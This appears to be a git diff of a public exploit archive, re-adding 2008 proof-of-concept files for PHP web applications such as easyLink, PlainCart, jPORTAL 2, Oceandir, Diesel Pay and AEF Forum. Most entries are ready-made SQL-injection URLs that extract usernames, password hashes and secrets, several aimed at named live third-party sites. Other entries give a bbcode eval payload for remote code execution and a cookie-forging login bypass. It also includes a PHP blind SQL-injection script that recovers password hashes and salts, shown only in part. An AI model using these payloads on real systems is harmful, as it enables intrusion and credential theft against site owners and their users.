@@ -1,27 +1,27 @@ -================================================================================ -easyLink V1.1.0 (detail.php) Remote SQL Injection Vulnerability -================================================================================ - - - -Discovered By: Egypt Coder - -home : WWW.Sec-Area.com - -Mail: Egyptcoder@hotmail.com - - - -Dork: Engine powered by easyLink V1.1.0. - - - -Exploit : - - -http://localhost/links/detail.php?act=show&cat=1+union+select+1,2,concat_ws(0x3a,user,passwort),4,5+from+elink_user - - -Greets rUnViruS, Error Code, H666p , Fear Master , ProViDoR - -# milw0rm.com [2008-09-19] +================================================================================ +easyLink V1.1.0 (detail.php) Remote SQL Injection Vulnerability +================================================================================ + + + +Discovered By: Egypt Coder + +home : WWW.Sec-Area.com + +Mail: Egyptcoder@hotmail.com + + + +Dork: Engine powered by easyLink V1.1.0. + + + +Exploit : + + +http://localhost/links/detail.php?act=show&cat=1+union+select+1,2,concat_ws(0x3a,user,passwort),4,5+from+elink_user + + +Greets rUnViruS, Error Code, H666p , Fear Master , ProViDoR + +# milw0rm.com [2008-09-19] diff --git a/platforms/php/webapps/6495.txt b/platforms/php/webapps/6495.txt index 1218fa142..91a6a3676 100755 --- a/platforms/php/webapps/6495.txt +++ b/platforms/php/webapps/6495.txt 
@@ -1,15 +1,15 @@ -================================== -Explay CMS <= 2.1 Persistent XSS and CSRF -================================== -Discovered by hodik -Mail: n.khodov@gmail.com - -1. Persistent XSS -This CMS has bad anti-XSS filter that cut only some basic vectors. The loginned user can inject persistent XSS by adding to article text or comment - -2. CSRF -User can get admin rights if admin open malicious page that contain, for instance: - -or merely insert it to comment or article text. - -# milw0rm.com [2008-09-19] +================================== +Explay CMS <= 2.1 Persistent XSS and CSRF +================================== +Discovered by hodik +Mail: n.khodov@gmail.com + +1. Persistent XSS +This CMS has bad anti-XSS filter that cut only some basic vectors. The loginned user can inject persistent XSS by adding to article text or comment + +2. CSRF +User can get admin rights if admin open malicious page that contain, for instance: + +or merely insert it to comment or article text. + +# milw0rm.com [2008-09-19] diff --git a/platforms/php/webapps/6499.txt b/platforms/php/webapps/6499.txt index 90c75e72f..1e0de6366 100755 --- a/platforms/php/webapps/6499.txt +++ b/platforms/php/webapps/6499.txt 
@@ -1,73 +1,73 @@ -########################################################## -# GulfTech Security Research September 20, 2008 -########################################################## -# Vendor : Electron Inc. -# URL : http://www.anelectron.com/ -# Version : AEF Forum <= 1.0.6 -# Risk : Remote Code Execution -########################################################## - - - -Description: -Advanced Electron Forum also known as AEF Forum is a full featured -online forum system written in php that allows webmasters and site -owners to host their own discussion forums within their website. -The Advanced Electron Forum software comes bundled with the popular -MKPortal package, but is also available as a free stand alone forum. -Unfortunately there are multiple remote code execution issues within -AEF that allow for an attacker to execute arbitrary php code with -privileges of the affected webserver. This is due to the improper -handling of evaluated bbcode within AEF Forum. Users should upgrade -their forums as soon as possible. - - - -Remote Code Execution: -There is a serious security issue within AEF Forums that allows for -forum users to easily execute arbitrary php code on the affected -webserver. This issue is due to AEF Forums sending wildcard matches -to the replacement parameter of preg_replace function, within double -quotes, while the eval switch is present. Below is one of the many -examples of the security issues within the bbcode handling of AEF. - -//Email Links -if($globals['bbc_email']){ - - $text = preg_replace( - array("/\[email=(.*?)\](.*?)\[\/email\]/ies", - "/\[email\](.*?)\[\/email\]/ies"), - array('check_email("$1", "$2")', - 'check_email("$1", "$1")'), $text); - -} - -As we can see from the above code, a wildcard match is used to gather -the matches sent to replacement parameter for evaluation. 
This is bad -because an attacker can use complex variable syntax within an [email] -tag (other tags are also vulnerable) and have it executed as php code. - -[email]{${phpinfo()}}[/email] - -If the above bb code was posted to a vulnerable AEF Forum then the php -within the tags would be executed. In this case the php code is simply -a phpinfo() call, but of course, other attacks are possible. - - - -Solution: -Thanks to Jim Haslip for his help with communicating this issue to -developers. Users should upgrade as soon as possible. - - - -Credits: -James Bercegay of the GulfTech Security Research Team - - - -Related Info: -The original advisory can be found at the following location -http://www.gulftech.org/?node=research&article_id=00131-09202008 - -# milw0rm.com [2008-09-20] +########################################################## +# GulfTech Security Research September 20, 2008 +########################################################## +# Vendor : Electron Inc. +# URL : http://www.anelectron.com/ +# Version : AEF Forum <= 1.0.6 +# Risk : Remote Code Execution +########################################################## + + + +Description: +Advanced Electron Forum also known as AEF Forum is a full featured +online forum system written in php that allows webmasters and site +owners to host their own discussion forums within their website. +The Advanced Electron Forum software comes bundled with the popular +MKPortal package, but is also available as a free stand alone forum. +Unfortunately there are multiple remote code execution issues within +AEF that allow for an attacker to execute arbitrary php code with +privileges of the affected webserver. This is due to the improper +handling of evaluated bbcode within AEF Forum. Users should upgrade +their forums as soon as possible. + + + +Remote Code Execution: +There is a serious security issue within AEF Forums that allows for +forum users to easily execute arbitrary php code on the affected +webserver. 
This issue is due to AEF Forums sending wildcard matches +to the replacement parameter of preg_replace function, within double +quotes, while the eval switch is present. Below is one of the many +examples of the security issues within the bbcode handling of AEF. + +//Email Links +if($globals['bbc_email']){ + + $text = preg_replace( + array("/\[email=(.*?)\](.*?)\[\/email\]/ies", + "/\[email\](.*?)\[\/email\]/ies"), + array('check_email("$1", "$2")', + 'check_email("$1", "$1")'), $text); + +} + +As we can see from the above code, a wildcard match is used to gather +the matches sent to replacement parameter for evaluation. This is bad +because an attacker can use complex variable syntax within an [email] +tag (other tags are also vulnerable) and have it executed as php code. + +[email]{${phpinfo()}}[/email] + +If the above bb code was posted to a vulnerable AEF Forum then the php +within the tags would be executed. In this case the php code is simply +a phpinfo() call, but of course, other attacks are possible. + + + +Solution: +Thanks to Jim Haslip for his help with communicating this issue to +developers. Users should upgrade as soon as possible. + + + +Credits: +James Bercegay of the GulfTech Security Research Team + + + +Related Info: +The original advisory can be found at the following location +http://www.gulftech.org/?node=research&article_id=00131-09202008 + +# milw0rm.com [2008-09-20] diff --git a/platforms/php/webapps/6500.txt b/platforms/php/webapps/6500.txt index 4f3c17a20..18be20d2d 100755 --- a/platforms/php/webapps/6500.txt +++ b/platforms/php/webapps/6500.txt 
@@ -1,10 +1,10 @@ -############################################################################################### -[+] Explay CMS <= 2.1 Insecure Cookie Handling Vulnerability -[+] Discovered By Stack -[+] Greetz : All my freind -################################################################################################ ---- -exploit: -javascript:document.cookie = "login=1; path=/"; document.cookie = "pass=1; path=/"; - -# milw0rm.com [2008-09-20] +############################################################################################### +[+] Explay CMS <= 2.1 Insecure Cookie Handling Vulnerability +[+] Discovered By Stack +[+] Greetz : All my freind +################################################################################################ +--- +exploit: +javascript:document.cookie = "login=1; path=/"; document.cookie = "pass=1; path=/"; + +# milw0rm.com [2008-09-20] diff --git a/platforms/php/webapps/6501.txt b/platforms/php/webapps/6501.txt index 6eee2d2f5..1f3fde185 100755 --- a/platforms/php/webapps/6501.txt +++ b/platforms/php/webapps/6501.txt 
@@ -1,32 +1,32 @@ -MyFWB 1.0 Remote SQL Injection - -Author: 0x90 -url: www.0x90.com.ar -Product: MyFWB -download: http://myfwb.co.cc/downloads/myfwb_1.0_FS_edition.zip -Version: 1.0 -URL: http://www.fsoft.co.nr/ -Vulnerability Class: SQL Injection -contact: Guns[at]0x90[dot]com[dot]ar - - -Username: -http://host/MyFWB/?page=-0x90+union+select+0,0,username,0+from+user - -Password: -http://host/MyFWB/?page=-0x90+union+select+0,0,password,0+from+user - -Email: -http://host/MyFWB/?page=-0x90+union+select+0,0,useremail,0+from+user - -Secret Key: -http://host/MyFWB/?page=-0x90+union+select+0,0,secret,0+from+user - - - - -Online Demostration: - -http://myfwb.co.cc/?page=-0x90+union+select+0,0,secret,0+from+user - -# milw0rm.com [2008-09-20] +MyFWB 1.0 Remote SQL Injection + +Author: 0x90 +url: www.0x90.com.ar +Product: MyFWB +download: http://myfwb.co.cc/downloads/myfwb_1.0_FS_edition.zip +Version: 1.0 +URL: http://www.fsoft.co.nr/ +Vulnerability Class: SQL Injection +contact: Guns[at]0x90[dot]com[dot]ar + + +Username: +http://host/MyFWB/?page=-0x90+union+select+0,0,username,0+from+user + +Password: +http://host/MyFWB/?page=-0x90+union+select+0,0,password,0+from+user + +Email: +http://host/MyFWB/?page=-0x90+union+select+0,0,useremail,0+from+user + +Secret Key: +http://host/MyFWB/?page=-0x90+union+select+0,0,secret,0+from+user + + + + +Online Demostration: + +http://myfwb.co.cc/?page=-0x90+union+select+0,0,secret,0+from+user + +# milw0rm.com [2008-09-20] diff --git a/platforms/php/webapps/6502.txt b/platforms/php/webapps/6502.txt index 7fdfdb2b0..993de7b94 100755 --- a/platforms/php/webapps/6502.txt +++ b/platforms/php/webapps/6502.txt 
@@ -1,40 +1,40 @@ -[~] Diesel Pay Script -[~] -[~] index.php (area) sql inj -[~] -[~] http://www.dieselscripts.com -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 20.09.2008 -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] contact: zorlu@w.cn -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] ----------------------------------------------------------- - -Exploit: - -http://localhost/script_path/index.php?a=browse&area=[SQL] - -[SQL]= - -ZoRLu'+union+select+null,null,null,null,null,concat(database(),0x3a,version(),0x3a,user()),null/* - -Demo: - -http://www.dieselscripts.com/demo/dieselpay/index.php?a=browse&area=ZoRLu'+union+select+null,null,null,null,null,concat(database(),0x3a,version(),0x3a,user()),null/* - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs -[~] -[~] http://www.z0rlu.blogspot.com online : ) -[~] -[~] home: yildirimordulari.org & r00tsecurity.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-09-20] +[~] Diesel Pay Script +[~] +[~] index.php (area) sql inj +[~] +[~] http://www.dieselscripts.com +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 20.09.2008 +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] contact: zorlu@w.cn +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] ----------------------------------------------------------- + +Exploit: + +http://localhost/script_path/index.php?a=browse&area=[SQL] + +[SQL]= + +ZoRLu'+union+select+null,null,null,null,null,concat(database(),0x3a,version(),0x3a,user()),null/* + +Demo: + +http://www.dieselscripts.com/demo/dieselpay/index.php?a=browse&area=ZoRLu'+union+select+null,null,null,null,null,concat(database(),0x3a,version(),0x3a,user()),null/* + 
+[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs +[~] +[~] http://www.z0rlu.blogspot.com online : ) +[~] +[~] home: yildirimordulari.org & r00tsecurity.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-09-20] diff --git a/platforms/php/webapps/6503.txt b/platforms/php/webapps/6503.txt index d3a1d24f5..92195a935 100755 --- a/platforms/php/webapps/6503.txt +++ b/platforms/php/webapps/6503.txt 
@@ -1,59 +1,59 @@ -################################################################ -# .___ __ _______ .___ # -# __| _/____ _______| | __ ____ \ _ \ __| _/____ # -# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # -# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # -# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # -# \/ \/ \/ # -# ___________ ______ _ __ # -# _/ ___\_ __ \_/ __ \ \/ \/ / # -# \ \___| | \/\ ___/\ / # -# \___ >__| \___ >\/\_/ # -# est.2007 \/ \/ forum.darkc0de.com # -################################################################ -# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # -#-QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE-DON-Outlawz # -# and all darkc0de members ---# -################################################################ -# -# Author: r45c4l -# -# Home : www.darkc0de.com -# -# Email : r45c4l@hotmail.com -# -# Share the c0de! -# -################################################################ -# -# Title: PlainCart (index.php) SQL Inj -# -# Script Download: http://www.phpwebcommerce.com/shopping-cart-source-code.php -# -# -########################################################### -# -# d0rk: n/a -# -########################################################### - - POC 1:- - - http://www.site.com/[script]/index.php?c=16&p=-3+UNION+SELECT+user_name,user_password,3,4,5+from+tbl_user-- - - - - - Live Demo: - - http://www.phpwebcommerce.com/plaincart/index.php?c=16&p=-3+UNION+SELECT+user_name,user_password,3,4,5+from+tbl_user-- - - - Admin panel: www.site.com/plaincart/admin/login.php - -########################################################### -# -# Bug discovered : 20 Sep.2008 -########################################################### - -# milw0rm.com [2008-09-20] +################################################################ +# .___ __ _______ .___ # +# __| _/____ _______| | __ ____ \ _ \ __| _/____ # +# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # +# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ 
# +# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # +# \/ \/ \/ # +# ___________ ______ _ __ # +# _/ ___\_ __ \_/ __ \ \/ \/ / # +# \ \___| | \/\ ___/\ / # +# \___ >__| \___ >\/\_/ # +# est.2007 \/ \/ forum.darkc0de.com # +################################################################ +# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # +#-QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE-DON-Outlawz # +# and all darkc0de members ---# +################################################################ +# +# Author: r45c4l +# +# Home : www.darkc0de.com +# +# Email : r45c4l@hotmail.com +# +# Share the c0de! +# +################################################################ +# +# Title: PlainCart (index.php) SQL Inj +# +# Script Download: http://www.phpwebcommerce.com/shopping-cart-source-code.php +# +# +########################################################### +# +# d0rk: n/a +# +########################################################### + + POC 1:- + + http://www.site.com/[script]/index.php?c=16&p=-3+UNION+SELECT+user_name,user_password,3,4,5+from+tbl_user-- + + + + + Live Demo: + + http://www.phpwebcommerce.com/plaincart/index.php?c=16&p=-3+UNION+SELECT+user_name,user_password,3,4,5+from+tbl_user-- + + + Admin panel: www.site.com/plaincart/admin/login.php + +########################################################### +# +# Bug discovered : 20 Sep.2008 +########################################################### + +# milw0rm.com [2008-09-20] diff --git a/platforms/php/webapps/6504.txt b/platforms/php/webapps/6504.txt index 83847ccc8..e5298b468 100755 --- a/platforms/php/webapps/6504.txt +++ b/platforms/php/webapps/6504.txt 
@@ -1,25 +1,25 @@ -/** - * @title Oceandir <= 2.9 (show_vote.php id) Remote SQL injection - * @author JEEN HACKER TEAM [ Jeen + Secertry ] - * @cost 250$ - * @script http://www.oceandir.com - * @copyright 2008 - * @homepage http://www.hackteach.org/cc/teach.php - * @email SVN@HOTMAIL.COM , CPY@HOTMAIL.COM - */ - -Exploit : -~user -http://www.site.com/dir/show_vote.php?id=-1+union+select+user_id,fname,3,4+from+users -~passwd -http://www.site.com/dir/show_vote.php?id=-1+union+select+1,hashed_pw,3,4+from+users - -Example : -#### -http://www.dir.qatarw.com/show_vote.php?id=-1+union+select+user_id,fname,3,4+from+users -http://www.dir.qatarw.com/show_vote.php?id=-1+union+select+1,hashed_pw,3,4+from+users -#### - -Greetz : www.hackteach.org user's - -# milw0rm.com [2008-09-20] +/** + * @title Oceandir <= 2.9 (show_vote.php id) Remote SQL injection + * @author JEEN HACKER TEAM [ Jeen + Secertry ] + * @cost 250$ + * @script http://www.oceandir.com + * @copyright 2008 + * @homepage http://www.hackteach.org/cc/teach.php + * @email SVN@HOTMAIL.COM , CPY@HOTMAIL.COM + */ + +Exploit : +~user +http://www.site.com/dir/show_vote.php?id=-1+union+select+user_id,fname,3,4+from+users +~passwd +http://www.site.com/dir/show_vote.php?id=-1+union+select+1,hashed_pw,3,4+from+users + +Example : +#### +http://www.dir.qatarw.com/show_vote.php?id=-1+union+select+user_id,fname,3,4+from+users +http://www.dir.qatarw.com/show_vote.php?id=-1+union+select+1,hashed_pw,3,4+from+users +#### + +Greetz : www.hackteach.org user's + +# milw0rm.com [2008-09-20] diff --git a/platforms/php/webapps/6505.txt b/platforms/php/webapps/6505.txt index 3abf90123..35299a6a4 100755 --- a/platforms/php/webapps/6505.txt +++ b/platforms/php/webapps/6505.txt 
@@ -1,64 +1,64 @@ -################################################################ -# .___ __ _______ .___ # -# __| _/____ _______| | __ ____ \ _ \ __| _/____ # -# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # -# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # -# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # -# \/ \/ \/ # -# ___________ ______ _ __ # -# _/ ___\_ __ \_/ __ \ \/ \/ / # -# \ \___| | \/\ ___/\ / # -# \___ >__| \___ >\/\_/ # -# est.2007 \/ \/ forum.darkc0de.com # -################################################################ -# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # -#-QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE-DON-Outlawz # -# and all darkc0de members ---# -################################################################ -# -# Author: r45c4l -# -# Home : www.darkc0de.com -# -# Email : r45c4l@hotmail.com -# -# Share the c0de! -# -################################################################ -# -# Title: jPORTAL 2 (humor.php) SQL Injection -# -# VEndor: http://jportal2.com/ -# -# -########################################################### -# -# d0rk: intext:"jPORTAL 2" & inurl:"humor.php" -# -########################################################### - - POC 1:- - - http://www.site.com/humor.php?id=-1+union+all+select+1,concat(nick,0x3a,pass),3,4,5,6,7,8,9,10+from+jp2admins-- - - POC 2:- - - http://www.site.com/humor.php?id=-1+union+all+select+1,concat(nick,0x3a,pass),3,4,5,6,7,8,9,10+from+admins-- - - Table names may vary from jp2admins to admins - - - Live Demo: - - http://www.domanski.pl/humor.php?id=-1+union+all+select+1,concat(nick,0x3a,pass),3,4,5,6,7,8,9,10+from+jp2admins-- - - http://gimnazjum.webd.pl/humor.php?id=-1+union+all+select+1,concat(nick,0x3a,pass),3,4,5,6,7,8,9,10+from+admins-- - - Admin panel: www.site.com/admin.php - -########################################################### -# -# Bug discovered : 21 Sep.2008 -########################################################### - -# milw0rm.com 
[2008-09-20] +################################################################ +# .___ __ _______ .___ # +# __| _/____ _______| | __ ____ \ _ \ __| _/____ # +# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # +# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # +# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # +# \/ \/ \/ # +# ___________ ______ _ __ # +# _/ ___\_ __ \_/ __ \ \/ \/ / # +# \ \___| | \/\ ___/\ / # +# \___ >__| \___ >\/\_/ # +# est.2007 \/ \/ forum.darkc0de.com # +################################################################ +# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu # +#-QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE-DON-Outlawz # +# and all darkc0de members ---# +################################################################ +# +# Author: r45c4l +# +# Home : www.darkc0de.com +# +# Email : r45c4l@hotmail.com +# +# Share the c0de! +# +################################################################ +# +# Title: jPORTAL 2 (humor.php) SQL Injection +# +# VEndor: http://jportal2.com/ +# +# +########################################################### +# +# d0rk: intext:"jPORTAL 2" & inurl:"humor.php" +# +########################################################### + + POC 1:- + + http://www.site.com/humor.php?id=-1+union+all+select+1,concat(nick,0x3a,pass),3,4,5,6,7,8,9,10+from+jp2admins-- + + POC 2:- + + http://www.site.com/humor.php?id=-1+union+all+select+1,concat(nick,0x3a,pass),3,4,5,6,7,8,9,10+from+admins-- + + Table names may vary from jp2admins to admins + + + Live Demo: + + http://www.domanski.pl/humor.php?id=-1+union+all+select+1,concat(nick,0x3a,pass),3,4,5,6,7,8,9,10+from+jp2admins-- + + http://gimnazjum.webd.pl/humor.php?id=-1+union+all+select+1,concat(nick,0x3a,pass),3,4,5,6,7,8,9,10+from+admins-- + + Admin panel: www.site.com/admin.php + +########################################################### +# +# Bug discovered : 21 Sep.2008 +########################################################### + +# milw0rm.com 
[2008-09-20] diff --git a/platforms/php/webapps/6507.php b/platforms/php/webapps/6507.php index 0e7ad8880..e518a471d 100755 --- a/platforms/php/webapps/6507.php +++ b/platforms/php/webapps/6507.php @@ -1,400 +1,400 @@ -Attention!\n"; - echo "

    \n"; - echo "

    Warning!

    \n"; - echo "This exploit is meant to be used as php CLI script!
    \n"; - echo "More information:
    \n"; - echo "
    http://www.google.com/search?hl=en&q=php+cli+windows
    \n"; - echo "Still, you can try to run it from webserver.
    \n"; - echo "Just press the button below and prepare for long waiting
    \n"; - echo "And learn to use php CLI next time, please ...
    \n"; - echo "\n"; - echo "\n"; - echo "\n"; - echo "
    \n"; - exit; - } - else - { - // Let's try to maximize our chances without CLI - @set_time_limit(0); - } -} -//===================================================================== -xecho("Target: $url\n"); -xecho("Sql table prefix: $prefix\n"); -xecho("Testing target URL ... \n"); -test_target_url(); -xecho("Target URL seems to be valid\n"); -xecho("Testing target ID ... \n"); -test_target_id(); -xecho("Target ID seems to be valid\n"); - -$hash = get_hash(); -$salt = get_salt(); - -add_line("Target: $url"); -add_line("User ID: $id"); -add_line("Hash: $hash"); -add_line("Salt: $salt"); -add_line("------------------------------------------"); - -xecho("\n------------------------------------------\n"); -xecho("Hash: $hash\n"); -xecho("Salt: $salt"); -xecho("\n------------------------------------------\n"); - -xecho("\nQuestions and feedback - http://www.waraxe.us/ \n"); -die("See ya! :) \n"); -////////////////////////////////////////////////////////////////////// -////////////////////////////////////////////////////////////////////// -function test_target_url() -{ - global $url; - - $post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- '; - $buff = trim(make_post($url, $post, '', $url)); - if($buff !== 'found') - { - die('Invalid response, target URL not valid? Exiting ...'); - } -} -////////////////////////////////////////////////////////////////////// -function test_target_id() -{ - global $url, $prefix, $id; - - $post = 'UNION SELECT 1,1 FROM ' . $prefix . 'members_converge WHERE converge_id=' . $id . ' AND LENGTH(converge_pass_hash)=32'; - if(!test_condition($post)) - { - die('Invalid response, target ID not valid? 
Exiting ...'); - } -} -/////////////////////////////////////////////////////////////////////// -function get_salt() -{ - $len = 5; - $out = ''; - - xecho("Finding salt ...\n"); - - for($i = 1; $i < $len + 1; $i ++) - { - $ch = get_saltchar($i); - xecho("Got pos $i --> $ch\n"); - $out .= "$ch"; - xecho("Current salt: $out \n"); - } - - xecho("\nFinal salt: $out\n\n"); - - return $out; -} -/////////////////////////////////////////////////////////////////////// -function get_saltchar($pos) -{ - global $prefix, $id; - - $char = ''; - $min = 32; - $max = 128; - $pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_salt,$pos,1))"; - $curr = 0; - - while(1) - { - $area = $max - $min; - if($area < 2 ) - { - $post = $pattern . "=$max"; - $eq = test_condition($post); - - if($eq) - { - $char = chr($max); - } - else - { - $char = chr($min); - } - - break; - } - - $half = intval(floor($area / 2)); - $curr = $min + $half; - - $post = $pattern . '%253e' . $curr; - - $bigger = test_condition($post); - - if($bigger) - { - $min = $curr; - } - else - { - $max = $curr; - } - - xecho("Current test: $curr-$max-$min\n"); - } - - return $char; -} -/////////////////////////////////////////////////////////////////////// -function get_hash() -{ - $len = 32; - $out = ''; - - xecho("Finding hash ...\n"); - - for($i = 1; $i < $len + 1; $i ++) - { - $ch = get_hashchar($i); - xecho("Got pos $i --> $ch\n"); - $out .= "$ch"; - xecho("Current hash: $out \n"); - } - - xecho("\nFinal hash: $out\n\n"); - - return $out; -} -/////////////////////////////////////////////////////////////////////// -function get_hashchar($pos) -{ - global $prefix, $id; - - $char = ''; - $pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_hash,$pos,1))"; - - // First let's determine, if it's number or letter - $post = $pattern . 
'%253e57'; - $letter = test_condition($post); - - if($letter) - { - $min = 97; - $max = 102; - xecho("Char to find is [a-f]\n"); - } - else - { - $min = 48; - $max = 57; - xecho("Char to find is [0-9]\n"); - } - - $curr = 0; - - while(1) - { - $area = $max - $min; - if($area < 2 ) - { - $post = $pattern . "=$max"; - $eq = test_condition($post); - - if($eq) - { - $char = chr($max); - } - else - { - $char = chr($min); - } - - break; - } - - $half = intval(floor($area / 2)); - $curr = $min + $half; - - $post = $pattern . '%253e' . $curr; - - $bigger = test_condition($post); - - if($bigger) - { - $min = $curr; - } - else - { - $max = $curr; - } - - xecho("Current test: $curr-$max-$min\n"); - } - - return $char; -} -/////////////////////////////////////////////////////////////////////// -function test_condition($p) -{ - global $url; - - $bret = false; - $maxtry = 10; - $try = 1; - - $pattern = 'act=xmlout&do=check-display-name&name=%%2527 OR 1=%%2522%%2527%%2522 %s OR 1=%%2522%%2527%%2522-- '; - $post = sprintf($pattern, $p); - - while(1) - { - $buff = trim(make_post($url, $post, '', $url)); - - if($buff === 'found') - { - $bret = true; - break; - } - elseif($buff === 'notfound') - { - break; - } - elseif(strpos($buff, 'IPS Driver Error') !== false) - { - die("Sql error! Wrong prefix?\nExiting ... 
"); - } - else - { - xecho("test_condition() - try $try - invalid return value ...\n"); - $try ++; - if($try > $maxtry) - { - die("Too many tries - exiting ...\n"); - } - else - { - xecho("Trying again - try $try ...\n"); - } - } - } - - return $bret; -} -/////////////////////////////////////////////////////////////////////// -function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE) -{ - $ch = curl_init(); - $timeout = 120; - curl_setopt ($ch, CURLOPT_URL, $url); - curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); - curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); - curl_setopt($ch, CURLOPT_POST, 1); - curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields); - curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0); - curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)'); - - if(!empty($GLOBALS['proxy_ip_port'])) - { - curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']); - - if(!empty($GLOBALS['proxy_user_password'])) - { - curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']); - } - } - - if(!empty($cookie)) - { - curl_setopt ($ch, CURLOPT_COOKIE, $cookie); - } - - if(!empty($referer)) - { - curl_setopt ($ch, CURLOPT_REFERER, $referer); - } - - if($headers === TRUE) - { - curl_setopt ($ch, CURLOPT_HEADER, TRUE); - } - else - { - curl_setopt ($ch, CURLOPT_HEADER, FALSE); - } - - $fc = curl_exec($ch); - curl_close($ch); - - return $fc; -} -/////////////////////////////////////////////////////////////////////// -function add_line($line) -{ - global $outfile; - - $line .= "\n"; - $fh = fopen($outfile, 'ab'); - fwrite($fh, $line); - fclose($fh); - -} -/////////////////////////////////////////////////////////////////////// -function xecho($line) -{ - if($GLOBALS['cli']) - { - echo "$line"; - } - else - { - $line = nl2br(htmlspecialchars($line)); - echo "$line"; - } -} -////////////////////////////////////////////////////////////////////// -?> - -# milw0rm.com [2008-09-21] +Attention!\n"; + 
echo "

    \n"; + echo "

    Warning!

    \n"; + echo "This exploit is meant to be used as php CLI script!
    \n"; + echo "More information:
    \n"; + echo "http://www.google.com/search?hl=en&q=php+cli+windows
    \n"; + echo "Still, you can try to run it from webserver.
    \n"; + echo "Just press the button below and prepare for long waiting
    \n"; + echo "And learn to use php CLI next time, please ...
    \n"; + echo "
    \n"; + echo "\n"; + echo "\n"; + echo "
    \n"; + exit; + } + else + { + // Let's try to maximize our chances without CLI + @set_time_limit(0); + } +} +//===================================================================== +xecho("Target: $url\n"); +xecho("Sql table prefix: $prefix\n"); +xecho("Testing target URL ... \n"); +test_target_url(); +xecho("Target URL seems to be valid\n"); +xecho("Testing target ID ... \n"); +test_target_id(); +xecho("Target ID seems to be valid\n"); + +$hash = get_hash(); +$salt = get_salt(); + +add_line("Target: $url"); +add_line("User ID: $id"); +add_line("Hash: $hash"); +add_line("Salt: $salt"); +add_line("------------------------------------------"); + +xecho("\n------------------------------------------\n"); +xecho("Hash: $hash\n"); +xecho("Salt: $salt"); +xecho("\n------------------------------------------\n"); + +xecho("\nQuestions and feedback - http://www.waraxe.us/ \n"); +die("See ya! :) \n"); +////////////////////////////////////////////////////////////////////// +////////////////////////////////////////////////////////////////////// +function test_target_url() +{ + global $url; + + $post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- '; + $buff = trim(make_post($url, $post, '', $url)); + if($buff !== 'found') + { + die('Invalid response, target URL not valid? Exiting ...'); + } +} +////////////////////////////////////////////////////////////////////// +function test_target_id() +{ + global $url, $prefix, $id; + + $post = 'UNION SELECT 1,1 FROM ' . $prefix . 'members_converge WHERE converge_id=' . $id . ' AND LENGTH(converge_pass_hash)=32'; + if(!test_condition($post)) + { + die('Invalid response, target ID not valid? 
